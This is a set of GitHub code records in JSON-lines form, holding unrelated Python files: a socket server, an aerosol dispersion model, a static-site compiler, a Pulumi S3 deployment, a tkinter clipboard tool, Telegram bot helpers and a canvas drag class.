client.close()\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n max_img_numbers = 100\n elif len(sys.argv) == 2:\n max_img_numbers = int(sys.argv[1])\n else:\n raise ValueError\n\n # start rest api server\n t1 = threading.Thread(target = start_rest_api)\n t1.setDaemon(True)\n t1.start()\n\n # bind to port to accept client\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.bind((HOST,USER_PORT))\n s.listen(1000)\n\n # global_database = {}\n # # get all images\n # images = [cv2.imread(FOLDER+f) for f in listdir(FOLDER) if isfile(join(FOLDER, f))]\n\n # # save to global images\n # for i, img in enumerate(images):\n # latent = feature_extractor.inference(img)\n # global_database[str(i)] = latent\n\n # with open('global_database.pkl', 'wb') as handler:\n # pickle.dump(global_database, handler)\n #### handle different folders #####\n\n try:\n with open(CWD+'/offloading_servers/global_database.pkl', 'rb') as handler:\n global_database = pickle.load(handler)\n except: pass \n try:\n with open('global_database.pkl', 'rb') as handler:\n global_database = pickle.load(handler)\n except: pass \n\n database = {}\n for key, val in global_database.items():\n database[key] = val # get the value\n if len(database)>=max_img_numbers: break\n\n print('database length is ', len(database)) # if no global_database loaded, then report error\n\n idx = 0\n # main loop for all incoming client\n while True:\n print(\"waiting for client connection...\")\n client_sock, addr = s.accept() # accept client\n user_id = str(idx)\n user = (user_id, client_sock, Queue(1000))\n USERS[user_id] = user\n print (\"new user socket id: \", user_id)\n idx += 1\n\n X = threading.Thread(target = user_thread, args=(user,))\n X.setDaemon(True)\n X.start()\n \n \n\n\n ","repo_name":"int-unl/End-to-End-Slicing","sub_path":"edge_application/asyn_mar_server.py","file_name":"asyn_mar_server.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"31790571920","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 11 18:48:46 2023\n\n@author: akimlavrinenko\n\"\"\"\n\nimport numpy as np #import numpy as np, to enable numpy arrays and numpy meshgrid\nimport matplotlib.pyplot as plt #import matplotlib.pyplot as plt to plot graphs\nfrom scipy.signal import fftconvolve #import convolve function from scipy.signal library\nimport time as timer\n\nstart = timer.time()\n#Parameters values -- User inputs floats\ntime = 50#event duration, in seconds\nt_inj = 0.4 #inhection duration, in seconds\ndelta_t = 0.1 #(s) time-steps\n\ndelta_x = 0.1 #(m) mesh-size\n\nl = 3.14 #x-length (m) of room\nw = 3.14 #y-length (m) of room\nh = 3.14 #z-length (m) of room\n\nx_o = 1 #x-coordinate of source\ny_o = 1.57 #y-coordinate of source\n\nv = 0.0856 #air velocity (m/s) from left to right. \nR = 1370 #aerosol emission rate (particles/s)\nQ = 0 #0.002 # Air exchange rate (s^-1)\n# K = 5e-3 #0.0053 # Eddy diffusion coefficient (m^2/s)\nd = 0 #1.7*10**(-4) #deactivation rate (s^-1)\ns = 0 # 1.1*10**(-4) #settling rate (s^-1)\n\n#set up mesh\nn_x = int(l / delta_x) + 1 #int: calculate number of x-steps\nn_y = int(w / delta_x) + 1 #int:calculate number of y-steps\nx = np.linspace(0,l,n_x) #define numpy array for x-axis\ny = np.linspace(0,w,n_y) #define numpy array for y-axis\nX,Y = np.meshgrid(x,y) #define numpy meshgrid for X,Y\n #Initialise numpy array of same size as X for C (the concentration)\n\n\nvmax = 1\nlevels = np.linspace(0, vmax, n_x+1)\n\n\nt_end = time\nn_t = int(t_end/delta_t)\nt_arr = np.asarray(np.linspace(delta_t,t_end,n_t))\n\n\n\nklist = [1e-1,1e-2,1e-3,1e-4]\ncolorlist = ['r','b','k','m','c','y']\nfor K in klist:\n sigmalist = []\n sigmaTsigma0list = []\n reslist = []\n t1sumsum = []\n term1temp = []\n term2temp = []\n term3temp = []\n\n for t in range(0,len(t_arr)):\n print('_____________________________________________________________')\n print(round(t_arr[t],3))\n m = int(v/(2*l)*t) \n t1 = np.zeros_like(X)\n t2 = np.zeros_like(Y)\n t1sum = []\n for i in range(len(x)):\n for j in range(len(y)):\n \n t1[i][j] = np.exp(-((X[i][j]-x_o-v*t_arr[t])**2)/(4*K*t_arr[t])) + np.exp(-((X[i][j]+x_o+v*t_arr[t])**2)/(4*K*t_arr[t]))\n t2[i][j] = np.exp(-((Y[i][j]-y_o)**2)/(4*K*t_arr[t])) + np.exp(-((Y[i][j]+y_o)**2)/(4*K*t_arr[t]))\n for n in range(1,m+1):\n t1[i][j] += np.exp(-((X[i][j]-x_o-v*t_arr[t] + 2*n*l)**2)/(4*K*t_arr[t])) + np.exp(-((X[i][j]+x_o+v*t_arr[t] - 2*n*l)**2)/(4*K*t_arr[t]))\n t1[i][j] += np.exp(-((X[i][j]-x_o-v*t_arr[t] - 2*n*l)**2)/(4*K*t_arr[t])) + np.exp(-((X[i][j]+x_o+v*t_arr[t] + 2*n*l)**2)/(4*K*t_arr[t]))\n for n in range(1,4):\n t2[i][j] += np.exp(-((Y[i][j]-y_o - 2*n*w)**2)/(4*K*t_arr[t])) + np.exp(-((Y[i][j]+y_o + 2*n*w)**2)/(4*K*t_arr[t]))\n t2[i][j] += np.exp(-((Y[i][j]-y_o + 2*n*w)**2)/(4*K*t_arr[t])) + np.exp(-((Y[i][j]+y_o - 2*n*w)**2)/(4*K*t_arr[t]))\n \n t3 = np.exp(-(Q+d+s)*t_arr[t])\n \n term1temp.append(t1)\n term2temp.append(t2)\n term3temp.append(t3)\n \n term1tempArr = np.dstack(term1temp)\n term2tempArr = np.dstack(term2temp)\n \n term1tempArr[np.isnan(term1tempArr)] = 0\n term2tempArr[np.isnan(term2tempArr)] = 0\n \n S = np.full(np.shape(term1temp)[0], R)*delta_t\n C = np.zeros_like(X)\n \n integlist = []\n \n for i in range(len(x)):\n for j in range(len(y)):\n integ = 1/(4*np.pi*K*t_arr[:t+1]) * term1tempArr[0,i,:] * term2tempArr[j,0,:] * term3temp[:t+1]\n C[j][i] = fftconvolve(S,integ,mode='valid') / (h/2) #* delta_x**2\n \n reslist.append(C)\n cc = np.unravel_index(C.argmax(), C.shape)\n ccc = np.subtract(np.asarray(t1.shape),1)/2\n \n if t_arr[t] > t_inj:\n sigma = np.zeros_like(X)\n itemindex = np.where(t_arr == t_inj+delta_t)\n C = np.subtract(reslist[t],reslist[t-itemindex[0][0]])\n C[C<0] = 0\n cc_max = np.unravel_index(C.argmax(), C.shape)\n \n Cinf = sum(sum(C))*delta_x**2 / (l*w)\n for i in range(len(x)):\n for j in range(len(y)):\n sigma[j][i] = (C[j][i] - Cinf)**2\n \n sigma = np.sqrt(sum(sum(sigma)) / (n_x*n_y))\n print('sigma: ', sigma)\n sigmalist.append(sigma)\n \n \n print('ps', sum(sum(C))/(l*w),'|', 'max value: ',cc_max, C[cc_max[0]][cc_max[1]])\n diff0 = abs(C[cc_max[0]][cc_max[1]] - C[0,0])\n diff1 = abs(C[cc_max[0]][cc_max[1]] - C[0,np.asarray(t1.shape)[0]-1])\n diff2 = abs(C[cc_max[0]][cc_max[1]] - C[np.asarray(t1.shape)[0]-1,0])\n diff3 = abs(C[cc_max[0]][cc_max[1]] - C[np.asarray(t1.shape)[0]-1, np.asarray(t1.shape)[0]-1])\n \n\n if K == klist[0]:\n linestyle = 'o'\n label = 'K = ' + str(klist[0])\n color = 'k'\n elif K == klist[1]:\n linestyle = 's'\n label = 'K = ' + str(klist[1])\n color = 'r'\n elif K == klist[2]:\n linestyle = '*'\n label = 'K = ' + str(klist[2])\n color = 'b'\n elif K == klist[3]:\n linestyle = 'v'\n label = 'K = ' + str(klist[3])\n color = 'c'\n elif K == klist[4]:\n linestyle = \"^\"\n label = 'K = ' + str(klist[4])\n color = 'y'\n \n if t_arr[t] == t_inj+delta_t:\n sss = sigmalist[t-itemindex[0][0]]/sigmalist[0]\n sigmaTsigma0list.append(sss)\n plt.plot(t_arr[t], sss, marker = linestyle, color = color, markersize = 3, label = label)\n elif t_arr[t] > t_inj+delta_t:\n sss = sigmalist[t-itemindex[0][0]]/sigmalist[0]\n sigmaTsigma0list.append(sss)\n plt.plot(t_arr[t], sss, marker = linestyle, color = color, markersize = 3)\n end = timer.time()\n print('loop time ', round(end - start, 3), 's')\n \n res = np.asarray([t_arr[4:],sigmaTsigma0list]).T\n np.savetxt('./sigma_' + str(K) + '.dat', res)\n \nplt.ylabel('sigma[t]/sigma[t=0.4]')\nplt.xlabel('t, s')\nplt.legend(loc=\"upper right\")\nplt.ylim(0,1.1)\nplt.savefig('./sigma2.png', dpi = 200)\nplt.show()\n \n \ndef chunkIt(seq, num):\n avg = len(seq) / float(num)\n out = []\n last = 0.0\n\n while last < len(seq):\n out.append(seq[int(last):int(last + avg)])\n last += avg\n\n return out\n\n\n","repo_name":"Akimlav/dispersion","sub_path":"sigma_Lau_model.py","file_name":"sigma_Lau_model.py","file_ext":"py","file_size_in_byte":6661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37086910336","text":"import re\nimport markdown\nimport time\n\nfrom FileMgr import FileMgr\nfrom BopSource import BopSource, BopLayouts\nfrom BopReferences import BopReferences\nfrom BopValidator import BopValidator\nfrom BopIndexCompiler import BopIndexCompiler\nfrom BopValidationError import BopValidationError\n\n\nclass BopCompiler:\n local = False\n verbose = False\n generate_indices_locally = False # defaults to False, when local == True\n\n # (this will skip index generation to improve performance of compilation)\n # If amended to True, please set to False again when checking in a pull request.\n\n def __init__(self):\n self.fm = FileMgr()\n self.templates = dict()\n self._main_template = \"\"\n self.sources = dict()\n self.indices = dict()\n self._source_references = None\n self.references = None\n self._source_licenses = list()\n self._source_licenses_ids = set()\n self._load_templates()\n self._validator = None\n self._index_compiler = None\n\n def _load_templates(self):\n templates = self.fm.get_folder_content(\"_compile/_templates\")\n for template in templates:\n self.templates[template] = self.fm.get_file_content(\"_compile/_templates\", template)\n\n def compile(self):\n self.fm.clear_docs()\n self._main_template = self.templates[\"main.html\"]\n self._main_template = self._main_template.replace(\"{{ meta }}\", self.templates[\"meta.html\"])\n self._main_template = self._main_template.replace(\"{{ header }}\", self.templates[\"header.html\"])\n self._main_template = self._main_template.replace(\"{{ footer }}\", self.templates[\"footer.html\"])\n self._compile_sources()\n self._compile_assets()\n\n def _compile_sources(self):\n self.prepare_all_sources()\n self.references = BopReferences(self._source_references, self._source_licenses)\n self._validate_all_sources()\n self._making_all_indices()\n self._render_all_sources()\n if BopCompiler.local:\n self._make_local()\n self._write_compiled_sources()\n self._write_sitemap()\n\n def _make_local(self):\n print(\" Making sources local...\")\n for source in self.sources:\n bop_source = self.sources[source]\n content_replaced = bop_source.get_compiled_content()\n project_root = str(FileMgr.get_project_folder()).replace(\"\\\\\", \"/\")\n content_replaced = content_replaced.replace(BopSource.url_root, project_root + \"/docs\")\n # replace image urls starting with the root url to local\n content_replaced = content_replaced.replace(BopSource.url_images, project_root + \"/_sources\")\n bop_source.set_compiled_content(content_replaced)\n\n def _write_compiled_sources(self):\n print(\"Writing compiled sources...\")\n for source in self.sources:\n bop_source = self.sources[source]\n if bop_source.layout != BopLayouts.hidden:\n file_destination = bop_source.get_file_destination()\n self.fm.write_file(file_destination, bop_source.name + \".html\", bop_source.get_compiled_content())\n\n def _render_references(self, bop_source: BopSource):\n references_md = \"
\\n\"\n has_references = False\n has_footnotes = False\n licenses = self.references.get_licenses_for_bop_source(bop_source)\n if len(licenses) > 0:\n references_md += \"### References\\n\"\n for lic in licenses:\n has_references = True\n bop_license = licenses[lic]\n references_md += \"\\n#### \" + bop_license.license_source.title + \"\\n\\n\"\n for reference_id in bop_license.references:\n references_md += \"1. \" + bop_license.references[reference_id] + \"\\n\"\n body_of_reference = bop_license.license_source.get_body()\n if body_of_reference != \"\":\n references_md += \"\\n\" + body_of_reference + \"\\n\"\n\n if re.search(r\"\\[\\^.*?\\]\", bop_source.get_pre_body() + \"\\n\" + bop_source.get_body()):\n has_references = True\n has_footnotes = True\n if has_footnotes:\n references_md += \"\\n#### Footnotes\\n\"\n if has_references:\n return references_md\n else:\n return \"\"\n\n def _get_contributors(self, bop_source):\n cc_by_sa = self.references.get_cc_by_sa()\n references_md = \"
\\n\"\n\n improve_this_site_html = \" {3}\".format(\n 'improve this site',\n BopSource.url_images,\n bop_source.get_file_destination() + \"/\" + bop_source.name + \".md\",\n \"\".format(BopSource.url_images))\n improvement_history_html = \" {3}\".format(\n 'improvement history',\n BopSource.url_commits,\n bop_source.get_file_destination() + \"/\" + bop_source.name + \".md\",\n \"\".format(BopSource.url_images))\n references_md += \"{0}[{1}][ccbysa]! {2} {3}
\".format(\n \"Thank you to the contributors under \", \"CC BY-SA 4.0\", improve_this_site_html,\n improvement_history_html)\n references_md += bop_source.get_contributors()\n references_md += \"
\\n\\n\"\n references_md += \"[ccbysa]:\" + cc_by_sa.publisher + \"\\n\"\n return references_md\n\n def prepare_all_sources(self):\n print(\"Preparing all sources...\")\n sources = self.fm.get_folder_content_rek()\n for file in sources:\n if \"_sources/_references/references.md\" in file:\n bop_source = BopSource(file)\n self._source_references = bop_source\n elif \"_sources/_licenses\" in file:\n bop_source = BopSource(file)\n self._source_licenses.append(bop_source)\n if bop_source.nodeid in self._source_licenses_ids:\n raise BopValidationError(\"LICENSE\", \"01\",\n \"Duplicate license \" + bop_source.nodeid + \" in \" +\n bop_source.get_file_name())\n else:\n self._source_licenses_ids.add(bop_source.nodeid)\n else:\n bop_source = BopSource(file)\n self.sources[file] = bop_source\n\n def _validate_all_sources(self):\n print(\"Validating sources...\")\n self._validator = BopValidator(self.sources)\n self._index_compiler = BopIndexCompiler(self._validator)\n\n def _making_all_indices(self):\n if not self.local:\n self.__making_all_indices()\n else:\n if self.generate_indices_locally:\n self.__making_all_indices()\n else:\n print(\" Skipping local compilation of all index html files for performance reasons.\")\n\n def __making_all_indices(self):\n print(\" Making tree index\")\n self.indices[\"{{ tree-index }}\"] = self._index_compiler.get_tree_index()\n print(\" Making building block index\")\n self.indices[\"{{ bb-index }}\"] = self._index_compiler.get_building_block_index()\n self.indices[\"{{ bbo-index }}\"] = self._index_compiler.get_other_building_block_index()\n self.indices[\"{{ bbh-index }}\"] = self._index_compiler.get_history_building_block_index()\n print(\" Making issue index\")\n self.indices[\"{{ q-index }}\"] = self._index_compiler.get_issue_index()\n print(\" Making contributors index (github users)\")\n self.indices[\"{{ cg-index }}\"] = self._index_compiler.get_github_contributors_index()\n print(\" Making contributors index (non-github users)\")\n self.indices[\"{{ cng-index }}\"] = self._index_compiler.get_non_github_contributors_index()\n print(\" Making interactive widgets index\")\n self.indices[\"{{ w-index }}\"] = self._index_compiler.get_widgets_index()\n print(\" Making sourcecode index\")\n self.indices[\"{{ sc-index }}\"] = self._index_compiler.get_sourcecode_index()\n print(\" Making person index (by name)\")\n self.indices[\"{{ pbn-index }}\"] = self._index_compiler.get_person_index_by_name()\n print(\" Making person index (by birth year)\")\n self.indices[\"{{ pby-index }}\"] = self._index_compiler.get_person_index_by_birth_year()\n print(\" Making person index (by tag)\")\n self.indices[\"{{ pbt-index }}\"] = self._index_compiler.get_person_index_by_tag()\n print(\" Making keywords index\")\n self.indices[\"{{ ii-index }}\"] = self._index_compiler.get_keywords_index()\n\n def _render_all_sources(self):\n print(\"Rendering sources...\")\n self._render_all_references()\n self._render_all_tocs()\n self._render_all_markdowns()\n\n def _render_all_tocs(self):\n print(\" Rendering tables of content\")\n pc = self._validator.get_parent_child_graph()\n nodes = self._validator.get_nodes()\n for parentid in pc:\n self.__create_toc(parentid, self.__collect_children_for_toc(pc, nodes, parentid), nodes)\n\n def __collect_children_for_toc(self, pc: dict, nodes: dict, parentid: str):\n distinct_related_tocs = dict()\n pc[parentid].sort(key=self._validator.get_order_id)\n for child in pc[parentid]:\n bop_source = nodes[child]\n if bop_source.layout in BopSource.related_layouts:\n title = BopSource.get_plural_layout_title(bop_source.layout)\n if title not in distinct_related_tocs:\n distinct_related_tocs[title] = list()\n distinct_related_tocs[title].append(child)\n else:\n if bop_source.title in distinct_related_tocs:\n AssertionError(\"Title '{0}' used in {1} was already used among siblings {2}\".format(\n bop_source.title,\n bop_source.get_file_name(),\n str(distinct_related_tocs[bop_source.title])\n ))\n else:\n distinct_related_tocs[bop_source.title] = bop_source\n return distinct_related_tocs\n\n def __create_toc(self, parentid: str, distinct_related_tocs: dict, nodes: dict):\n toc = \"\"\n bop_source = nodes[parentid]\n if bop_source.layout not in [BopLayouts.default, BopLayouts.index, BopLayouts.hidden]:\n toc += \"\\n\\n\"\n # first, create a toc of related nodes\n for title in distinct_related_tocs:\n if isinstance(distinct_related_tocs[title], list):\n toc += title + \": \"\n counter = 0\n for node_id in distinct_related_tocs[title]:\n counter += 1\n bop_source1 = nodes[node_id]\n toc += \"{1} \".format(bop_source1.url(), counter)\n # now, create a list of other subnodes\n toc += \"\\n\\n\"\n counter = 0\n for title in distinct_related_tocs:\n if isinstance(distinct_related_tocs[title], BopSource):\n counter += 1\n bop_source1 = distinct_related_tocs[title]\n toc += str(counter) + \". {1}\\n\".format(bop_source1.url(),\n bop_source1.get_plane_long_title())\n bop_source.set_toc(toc)\n\n def _render_all_references(self):\n print(\" Rendering references\")\n for source in self.sources:\n bop_source = self.sources[source]\n if bop_source.layout != BopLayouts.default:\n references_md = self._get_contributors(bop_source)\n references_md += self._render_references(bop_source)\n bop_source.set_references_md(references_md)\n\n def _render_all_markdowns(self):\n print(\" Rendering markdowns\")\n for source in self.sources:\n start_time = time.time()\n bop_source = self.sources[source]\n content_replaced = self._replace_template(self._main_template, bop_source)\n if bop_source.parent is not None and bop_source.parent.nodeid == 'bookofproofs$i':\n content_replaced = self._replace_indices(content_replaced)\n bop_source.set_compiled_content(content_replaced)\n if BopCompiler.verbose:\n print(\" {0}s: {1}\".format(\"%.2f\" % (time.time() - start_time), source))\n\n def _replace_indices(self, content_replaced: str):\n for index in self.indices:\n content_replaced = content_replaced.replace(index, self.indices[index])\n return content_replaced\n\n def _replace_template(self, content, bop_source):\n body = \"\"\n if len(bop_source.categories) > 0:\n body += bop_source.get_categories_links() + \"\\n\"\n body += bop_source.get_content_of_node() + \"\\n\"\n body += bop_source.get_toc() + \"\\n\"\n if bop_source.layout == BopLayouts.person:\n body += bop_source.get_relevant_tags_html() + \"\\n\"\n body += bop_source.get_referencing_nodes_html() + \"\\n\"\n body += bop_source.get_references_md()\n body += bop_source.get_link_references()\n\n content_replaced = content.replace(\"{{ body }}\",\n markdown.markdown(body, tab_length=2,\n extensions=['pymdownx.magiclink', 'tables', 'footnotes',\n 'def_list']))\n content_replaced = self._make_tables_responsive(content_replaced)\n content_replaced = content_replaced.replace(\"{{ keywords }}\", \",\".join(bop_source.keywords))\n content_replaced = content_replaced.replace(\"{{ description }}\", bop_source.description)\n content_replaced = content_replaced.replace(\"{{ title }}\", bop_source.title)\n content_replaced = self._replace_scripts(content_replaced, bop_source)\n content_replaced = self._escape_mathjax(r'(\\$.*?\\$)', content_replaced)\n content_replaced = self._escape_mathjax(r'(\\\\\\(.*?\\\\\\))', content_replaced)\n content_replaced = self._escape_mathjax(r'(\\\\\\[.*?\\\\\\])', content_replaced)\n return content_replaced\n\n def _compile_assets(self):\n print(\"Compiling assets...\")\n self._compile_sub_assets(\"css\")\n self._compile_sub_assets(\"js\")\n self._compile_sub_assets(\"jquery-ui\")\n self.fm.copy_folder(\"../_sources/_assets/jquery-ui/images\", \"../docs/assets/jquery-ui/images\")\n # Do not uncomment this. To save storage, we will store images only once in the source github repository\n # but not as a duplicate in the docs folder store. As a convention, all images' urls will refer to the source\n # self.fm.copy_folder(\"../_sources/_assets/images\", \"../docs/assets/images\")\n self.fm.copy_file(\"../_sources/_assets/images/fav.ico\", \"../docs/fav.ico\")\n # google site verification\n self.fm.copy_file(\"../_sources/_assets/other/google5e9ab19be7343012.html\",\n \"../docs/google5e9ab19be7343012.html\")\n # fpl syntax diagrams\n self.fm.copy_file(\"../_sources/_assets/other/FPLSyntaxDiagrams.xhtml\", \"../docs/FPLSyntaxDiagrams.html\")\n\n def _compile_sub_assets(self, sub):\n sub_contents = self.fm.get_folder_content(\"_sources/_assets/\" + sub)\n for file in sub_contents:\n content = self.fm.get_file_content(\"_sources/_assets/\" + sub, file)\n if file == \"bop.js\":\n search_links = self._index_compiler.get_search_autocomplete_index()\n content = content.replace(\"{{ search-links }}\", search_links)\n content = content.replace(\"{{ url }}\", BopSource.url_root)\n if BopCompiler.local:\n project_root = \"file:///\" + str(FileMgr.get_project_folder()).replace(\"\\\\\", \"/\")\n content = content.replace(BopSource.url_root, project_root + \"/docs\")\n self.fm.write_file(\"assets/\" + sub, file, content)\n\n @staticmethod\n def _make_tables_responsive(content: str):\n pattern = re.compile(r\"(.*<\\/table>)\", flags=re.S)\n replaced = re.sub(pattern, r\"
\\1
\", content)\n return replaced\n\n def _replace_scripts(self, content: str, bop_source: BopSource):\n pattern = re.compile(r'

(§§§\\d+)

')\n for match in pattern.finditer(content):\n key = match.group(1)\n if key in bop_source.scripts:\n script = bop_source.scripts[key]\n if bop_source.script_has_python(script):\n script = markdown.markdown(script, tab_length=3,\n extensions=['codehilite', 'fenced_code'])\n else:\n script = re.sub(r\"(^```[a-z]*$)\", r\"\", script, flags=re.M)\n content = content.replace(\"

\" + key + \"

\", \"\\n\" + script + \"\\n\")\n else:\n AssertionError(\"Script key {0} not found in {1}\".format(key, bop_source.get_file_name()))\n return content\n\n def _escape_mathjax(self, pattern_string: str, content: str):\n pattern = re.compile(pattern_string, flags=re.S)\n new_content = content\n for match in pattern.finditer(content):\n new_content = new_content.replace(\"\" + match.group(1) + \"\", match.group(1))\n return new_content\n\n def _write_sitemap(self):\n sitemaps = list()\n for source in self.sources:\n bop_source = self.sources[source]\n if bop_source.layout not in [BopLayouts.hidden, BopLayouts.default]:\n url = bop_source.url()\n if url == \"https://bookofproofs.github.io/index.html\":\n url = \"https://bookofproofs.github.io/\"\n sitemaps.append(url)\n elif \"https://bookofproofs.github.io/branches/\" in url or \\\n \"https://bookofproofs.github.io/history/\" in url:\n sitemaps.append(url)\n sitemaps.sort(key=lambda x: len(x))\n sitemap = \"\\n\".join(sitemaps)\n self.fm.write_file(\"\", \"sitemap.txt\", sitemap)\n\n def get_validator(self):\n return self._validator\n","repo_name":"bookofproofs/bookofproofs.github.io","sub_path":"_compile/BopCompiler.py","file_name":"BopCompiler.py","file_ext":"py","file_size_in_byte":18666,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39452130391","text":"import pulumi, os, mimetypes\nimport pulumi_aws as aws\n\nconfig = pulumi.Config()\nsite_dir = config.require(\"siteDir\") # requiring the config variable\n\nbucket = aws.s3.Bucket(\"my-bucket\",\n website={\n \"index_document\": \"index.html\"\n }\n)\n# bucket = aws.s3.Bucket(\"my-bucket\", bucket=\"this is a the name that AWS bucket is going to have\")\n\nfor file in os.listdir(site_dir):\n filePath = os.path.join(site_dir, file) # getting the html from the folder\n mime_type, _ = mimetypes.guess_type(filePath)# guess the mimetype of the file, python library\n obj = aws.s3.BucketObject(file, # making the bucket object\n bucket=bucket.id,\n source=pulumi.FileAsset(filePath),\n acl=\"public-read\", # making it so that public can see it\n content_type = mime_type\n )\n\npulumi.export(\"bucket_name\", bucket.id) # this is to show the output\npulumi.export(\"bucket_endpoint\", pulumi.Output.concat(\"http://\", bucket.website_endpoint)) # this is way to interpolation of string value ","repo_name":"jinwoov/IaC","sub_path":"pulumi-python-s3/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15472897466","text":"from tkinter import Tk, Listbox, \\\n EXTENDED, Button, END\nimport pyperclip\n\nclass Application:\n def __init__(self, clipboard):\n self.clipboard = clipboard\n \n def make_app(self):\n\n def get_list():\n sel = listbox.curselection()\n seltext = '\\n'.join([listbox.get(x) for x in sel])\n pyperclip.copy(seltext)\n app.destroy()\n\n def on_closing():\n pyperclip.copy(\"\")\n app.destroy()\n\n app = Tk()\n\n app.title(\"Буфер обмена\")\n\n width = app.winfo_screenwidth()\n height = app.winfo_screenheight()\n app.geometry(f'{int(width/2)}x{int(height/3.5)}')\n\n listbox = Listbox(app, selectmode = EXTENDED)\n listbox.grid(row=1, column=0, sticky=\"nsew\")\n\n button = Button(app, text = \"Вставить\", command = get_list, height=2)\n button.grid(row=2, column=0, sticky=\"nsew\")\n\n for text in self.clipboard:\n listbox.insert(END, text)\n\n listbox.selection_set(3)\n\n app.attributes('-topmost', True)\n app.update()\n app.attributes('-topmost', False)\n\n app.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\n app.columnconfigure(0, weight=1)\n app.rowconfigure(1, weight=1)\n\n listbox.configure(background=\"#242424\", fg=\"white\")\n button.configure(background=\"#434343\", fg=\"white\")\n\n app.mainloop()","repo_name":"maksymDrv/CopyPaster","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11151810646","text":"from pyrogram import ReplyKeyboardMarkup, InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom .api.pyroAPI import HelpBot\nfrom core.apps.abtest import services as abtest_services\nfrom core.apps.game.utils import game_dict, games_1\n\n\ndef send_msg(tg_id: int or str, text: str, session_name: str = None):\n client = HelpBot(session_name=session_name)\n client.send_msg(tg_id, text)\n\n\ndef broadcast(users: iter, message: str, keyboard: str):\n client = HelpBot(session_name=\"session_broadcast\")\n client.start()\n\n for user in users:\n try:\n if keyboard == \"start\":\n client.send_message(user.tg_id, message, reply_markup=_menu(user.tg_id))\n elif keyboard == \"games\":\n client.send_message(user.tg_id, message, reply_markup=_game_list(games_1, 0))\n elif keyboard == \"invite\":\n kb = InlineKeyboardMarkup([[InlineKeyboardButton(\"🤝 Пригласить друга\", switch_inline_query=\"start\")]])\n client.send_message(user.tg_id, message, reply_markup=kb)\n elif keyboard == \"deposit\":\n kb = InlineKeyboardMarkup([[InlineKeyboardButton(\"💳 Пополнить баланс\", callback_data=\"balance-buy_token\")]])\n client.send_message(user.tg_id, message, reply_markup=kb)\n elif keyboard == \"none\":\n client.send_message(user.tg_id, message)\n except:\n continue\n\n client.stop()\n\n\ndef _menu(tg_id: int):\n kb = ReplyKeyboardMarkup(\n [\n [abtest_services.get_text(tg_id, \"kb-games\")],\n [abtest_services.get_text(tg_id, \"kb-balance\"), abtest_services.get_text(tg_id, \"kb-help\")],\n [abtest_services.get_text(tg_id, \"kb-affiliate\")]\n ],\n resize_keyboard=True,\n )\n return kb\n\n\ndef _game_list(games, offset):\n kb_list = []\n if offset == 0:\n kb_list = [\n [InlineKeyboardButton(f'🔍 Поиск', callback_data=\"game-search\"),\n InlineKeyboardButton(f'⏩', callback_data=\"game-move-10\")]\n ]\n elif offset == 10:\n kb_list = [\n [InlineKeyboardButton(f'⏪', callback_data=\"game-move-0\"),\n InlineKeyboardButton(f'🔍 Поиск', callback_data=\"game-search\"),\n InlineKeyboardButton(f'⏩', callback_data=\"game-move-20\")]\n ]\n elif offset == 20:\n kb_list = [\n [InlineKeyboardButton(f'⏪', callback_data=\"game-move-10\"),\n InlineKeyboardButton(f'🔍 Поиск', callback_data=\"game-search\"),\n InlineKeyboardButton(f'⏩', callback_data=\"game-move-30\")]\n ]\n elif offset == 30:\n kb_list = [\n [InlineKeyboardButton(f'⏪', callback_data=\"game-move-20\"),\n InlineKeyboardButton(f'🔍 Поиск', callback_data=\"game-search\"),\n InlineKeyboardButton(f'⏩', callback_data=\"game-move-40\")]\n ]\n elif offset == 40:\n kb_list = [\n [InlineKeyboardButton(f'⏪', callback_data=\"game-move-30\"),\n InlineKeyboardButton(f'🔍 Поиск', callback_data=\"game-search\")]\n ]\n\n for game_id in games:\n game_title = games[game_id]\n emoji = game_dict[game_title][\"emoji\"]\n\n kb_list.append(\n [InlineKeyboardButton(f'{emoji} {game_title}', callback_data=f'game-{game_id}')])\n\n return InlineKeyboardMarkup(kb_list)\n\n\ndef get_tg_user(tg_id: int or str):\n client = HelpBot(session_name=\"get_tg_user_session\")\n client.start()\n\n tg_user = client.get_users(tg_id)\n user = {\n \"id\": tg_user.id,\n \"username\": \"[отсутствует]\",\n \"first_name\": \"[отсутствует]\",\n \"last_name\": \"[отсутствует]\",\n }\n\n if tg_user.username:\n user[\"username\"] = tg_user.username\n\n if tg_user.first_name:\n user[\"first_name\"] = tg_user.first_name\n\n if tg_user.last_name:\n user[\"last_name\"] = tg_user.last_name\n client.stop()\n return user\n","repo_name":"1337bot1337/games-bot","sub_path":"api/core/apps/helpbot/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17006974869","text":"from __future__ import annotations\nfrom abc import ABC, abstractmethod\nfrom src.graph.GraphModel import GraphModel\nfrom src.graph.DrawGraphConfig import DrawGraphConfig\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from src.ui.GraphCanvas import GraphCanvas\nfrom src.utils.Vector import Vector\nfrom src.graph.helpers.CanvasHelper import CanvasHelper\nfrom src.utils.Event import Event\nfrom copy import copy\n\nclass Draggable(ABC):\n @abstractmethod\n def drag(self, event):\n pass\n\n @abstractmethod\n def end_drag(self, event):\n pass\n\nclass DragCanvas(Draggable):\n def __init__(self, canvas: GraphCanvas, draw_config: DrawGraphConfig, graph: GraphModel):\n self.draging_node = None\n self.x = 0\n self.y = 0\n self.node_old_position: Vector | None = None\n self.canvas = canvas\n self.draw_config = draw_config\n self.graph = graph\n self.is_drag_node = True\n self.canvas_helper = CanvasHelper(self.canvas)\n 